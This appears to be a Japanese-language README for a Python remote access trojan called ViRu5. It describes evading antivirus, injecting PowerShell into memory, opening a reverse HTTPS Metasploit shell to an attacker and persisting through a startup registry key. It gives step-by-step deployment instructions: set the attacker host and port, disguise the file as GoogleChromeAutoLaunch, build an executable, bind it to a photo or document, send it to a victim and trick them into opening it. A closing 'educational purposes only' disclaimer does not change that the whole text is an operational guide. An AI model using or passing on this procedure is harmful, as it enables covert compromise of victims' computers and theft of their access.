python-rootkit
これは完全に検出不可能なPython RATであり、ほとんどのアンチウイルスをバイパスし、任意のWindowsマシンにバックドアを開き、リスニングマシンに対してリバースHTTPS Metasploit接続を確立します。
ViRu5のライフサイクル
- すべてのアンチウイルスをバイパスします。
- 悪意のあるPowerShellスクリプトをメモリに注入します。
- 攻撃者マシンへのリバースHTTPS接続を確立します。
- 10秒ごとにチェックし、接続がまだ存在することを確認します。存在しない場合は新しい接続を再確立します。
- レジストリキーをスタートアップに追加し、再起動後に攻撃者に再接続します。
手順
- viRu5/source.py のパラメータを自分の lhost と lport で更新します。
- source.py の名前を GoogleChromeAutoLaunch.py に変更します。
- GoogleChromeAutoLaunch.py、setup.py、およびアイコンファイル (icon.ico) を c:\python27 ディレクトリに追加します。
- コマンドプロンプトから以下を実行します。
cd c:\python27 && python setup.py py2exe
- RATファイルを Dist ディレクトリから見つけます。
- 任意の写真、PDF、Wordファイル、またはその他の種類のファイルにバインドします。
- 被害者に送信します。
- ソーシャルエンジニアリングスキルを使ってファイルを開かせます。
- リバースHTTPS Metasploit接続を受け取ります :)
テスト環境
- Windows 7 x64/x86
- Windows 8
- Windows 8.1 x64/x86
- Windows 10 x64/x86
謝辞
時間を費やして人々を助け、コミュニティをより強力にしてくれるすべてのセキュリティ研究者に感謝します。PowerShellEmpireのメンバーにも感謝します。
免責事項
これは教育目的のみです。第一に、このコードはパッチが適用されていないマシンに感染するセキュリティ問題について人々に警告することを目的としています。